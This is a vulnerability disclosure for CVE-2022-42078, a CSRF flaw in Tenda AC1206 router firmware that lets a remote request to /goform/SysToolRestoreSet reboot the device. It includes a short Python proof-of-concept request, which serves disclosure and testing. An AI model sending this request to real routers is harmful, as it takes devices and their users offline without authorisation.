Headline
CVE-2022-42078: myCVE/AC1206-2.md at main · tianhui999/myCVE
Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet.
Affect device: Tenda-AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01(https://www.tenda.com.cn/download/detail-2766.html)
Vulnerability Type: Cross Site Request Forgery (CSRF)
Impact: Denial of Service(DoS)
Vulnerability description
This vulnerability lies in the /goform/SysToolRestoreSet page which influences the lastest version of Tenda-AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 (https://www.tenda.com.cn/download/detail-2766.html)
The vulnerability exists in the file /bin/httpd , function fromSysToolRestoreSet .
It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.
POC and repetition
In order to reproduce the vulnerability, the following steps can be followed:
- Boot the firmware by qemu-system or other ways (real machine)
- Attack with the following POC attacks
import requests
url = “http://192.168.23.133/goform/SysToolRestoreSet”
r = requests.get(url)
print(r.content)
By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .